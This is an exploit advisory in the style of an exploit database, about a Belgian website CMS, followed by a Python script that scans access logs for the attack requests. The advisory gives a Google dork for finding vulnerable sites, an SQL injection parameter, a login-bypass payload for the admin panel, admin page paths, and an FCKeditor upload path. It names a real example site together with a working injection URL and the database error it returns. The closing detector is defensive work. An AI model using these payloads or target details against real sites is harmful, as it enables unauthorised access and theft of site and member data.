#################################################################################################
# Exploit Title : Copyright © 2011 - 2018 Webutation Belgium Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 18/09/2018
# Vendor Homepage : webutation.net ~ webutation.org
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] + CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:Copyright © 2011 - 2018 Webutation site:be
© Webutation 2018
# SQL Injection Exploit =>
/activiteit.php?id=[SQL Inj]
# Admin Panel Login Path =>
/admin/login.php
# Admin Login Bypass Exploit :
Username : '=''or'
Password : '=''or'
# Usable Admin Panel Control URL Links =>
/admin/ingelogged.php
/admin/activiteiten.php
/admin/info.php
/admin/medewerkers.php
/admin/leden.php
/admin/gastenboek.php
/admin/verslagen.php
# FCKEditor Filemanager Exploit =>
TARGET/fckeditor/editor/filemanager/connectors/uploadtest.html
TARGET/yourfilenamehere.txt
#################################################################################################
# Example Site => tgeverke.be => [ Proof of Concept for Authentication Bypass ] => archive.is/OQ8GQ
# Example Site for SQL Inj => tgeverke.be/activiteit.php?id=465%27
# SQL Database Error =>
FOUT1: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''465''' at line 1
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
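
For site owners running this CMS, the request patterns listed above can be looked for in web server access logs. The following is an added detection example, not part of the original advisory or the vendor's code. It assumes Combined Log Format; the allowlist address and all sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
ADMIN_ALLOWLIST = {"192.0.2.10"}  # assumption: addresses the site's admins use

def classify(line):
    """Return (client_ip, finding) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    try:
        url = urlsplit(target)
    except ValueError:
        return ip, "unparseable request target"
    path = url.path.lower()
    if path.endswith("/activiteit.php"):
        # parse_qs percent-decodes, so %27 is compared as a quote character.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            return ip, "non-numeric id on activiteit.php"
    if "/fckeditor/editor/filemanager/connectors/" in path:
        return ip, "FCKeditor connector page requested"
    if (path.startswith("/admin/") and path != "/admin/login.php"
            and status == "200" and ip not in ADMIN_ALLOWLIST):
        return ip, "admin page served to non-allowlisted client"
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log (documentation IP ranges, not real traffic).
T = "[18/Sep/2018:10:00:00 +0200]"
SAMPLE = [
    f'203.0.113.7 - - {T} "GET /activiteit.php?id=465 HTTP/1.1" 200 5120 "-" "-"',
    f'198.51.100.9 - - {T} "GET /activiteit.php?id=465%27 HTTP/1.1" 200 310 "-" "-"',
    f'198.51.100.9 - - {T} "GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 2048 "-" "-"',
    f'198.51.100.9 - - {T} "GET /admin/leden.php HTTP/1.1" 200 4096 "-" "-"',
    f'192.0.2.10 - - {T} "GET /admin/leden.php HTTP/1.1" 200 4096 "-" "-"',
    f'203.0.113.7 - - {T} "GET /admin/login.php HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

The login bypass itself is sent in the POST body and does not appear in a standard access log, so the admin-page rule relies on the allowlist rather than on the payload.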